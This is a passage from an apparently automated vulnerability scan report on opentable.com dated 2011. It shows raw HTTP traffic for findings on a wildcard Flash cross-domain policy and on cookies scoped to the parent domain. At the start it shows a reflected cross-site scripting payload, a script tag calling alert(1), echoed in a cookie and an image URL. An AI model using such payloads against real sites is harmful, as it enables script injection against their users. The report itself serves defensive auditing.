Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=7&vbefreg=7&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestrefe0e8f"><script>alert(1)</script>b73d6d090c&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=skemQm14LQ9C4cW7t%2fOSWA%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestrefe0e8f"><script>alert(1)</script>b73d6d090c&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=skemQm14LQ9C4cW7t%2fOSWA%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestrefe0e8f"><script>alert(1)</script>b73d6d090c&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=skemQm14LQ9C4cW7t%2fOSWA%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Vary: Accept-Encoding
Content-Length: 46339


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
<img src="http://o.opentable.com/b/ss/otrestrefe0e8f"><script>alert(1)</script>b73d6d090c/1/H.22.1--NS/0" height="1" width="1" border="0" alt="" />
...[SNIP]...

4. Flash cross-domain policy  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.opentable.com

Response

HTTP/1.1 200 OK
Content-Length: 428
Content-Type: text/xml
Last-Modified: Fri, 23 Sep 2011 02:11:06 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-08
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:20-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:53:34 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.eyewonder.com" />
<allow-access-from domain="eyewonder.com" />
<allow-access-from domain="*.eyewonder.com" />
<allow-access-from domain="eyewonderlabs.com" />
<allow-access-from domain="*.eyewonderlabs.com" />
...[SNIP]...

5. Cookie scoped to parent domain  previous  next
There are 5 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


5.1. http://www.opentable.com/frontdoor/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /frontdoor/default.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /frontdoor/default.aspx?rid=90&restref=90&bgcolor=e3d4a4&titlecolor=000000&subtitlecolor=000000&btnbgimage=http://www.opentable.com/frontdoor/img/ot_btn_black.png&otlink=FFFFFF&icon=dark&mode=short HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Mon, 03 Oct 2011 12:53:35 GMT
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:53:35 GMT; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; domain=.opentable.com; path=/
Vary: Accept-Encoding
Content-Length: 64483

document.write("<link href=\"http://www.opentable.com/frontdoor/css/ot_short.css?v=Web_11_10_0_11.prod.com\" rel=\"styleSheet\" type=\"text/css\" /><!--[if IE]><link type=\"text/css\" href=\"http://ww
...[SNIP]...

5.2. http://www.opentable.com/interim.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /interim.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; pgseq=; ftc=x=10%2f03%2f2011+15%3a54%3a43&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=0

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:44 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-04
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=0&hr=http://www.grandcafe-sf.com/&tp=136; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Vary: Accept-Encoding
Content-Length: 5566


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head><meta http-equiv="content-type" content="text/html; chars
...[SNIP]...

5.3. http://www.opentable.com/jaspers-corner-tap-and-kitchen  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /jaspers-corner-tap-and-kitchen

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jaspers-corner-tap-and-kitchen?rid=200&restref=200 HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.kimptonhotels.com/restaurants/restaurant-reservations.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:50 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: restrefwhite=200; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&vbefres=1&vbefreg=1&js=0&m=4&restref=200; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&vbefres=1&vbefreg=1&js=0&m=4&restref=200; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: jslt=DhNUH7QEwV0b0tKkwEp2937edj1JsmX2; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Vary: Accept-Encoding
Content-Length: 199696


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns
...[SNIP]...

5.4. http://www.opentable.com/opentables.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /opentables.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:50 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a50&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=HOc063kcXtuTOSWwv4Mb2w%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=HOc063kcXtuTOSWwv4Mb2w%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=HOc063kcXtuTOSWwv4Mb2w%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=1&vbefreg=1&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=HOc063kcXtuTOSWwv4Mb2w%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=1&vbefreg=1&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=1&vbefreg=1&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=HOc063kcXtuTOSWwv4Mb2w%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=HOc063kcXtuTOSWwv4Mb2w%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=HOc063kcXtuTOSWwv4Mb2w%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Vary: Accept-Encoding
Content-Length: 46252


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...

5.5. http://www.opentable.com/restaurant-search.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
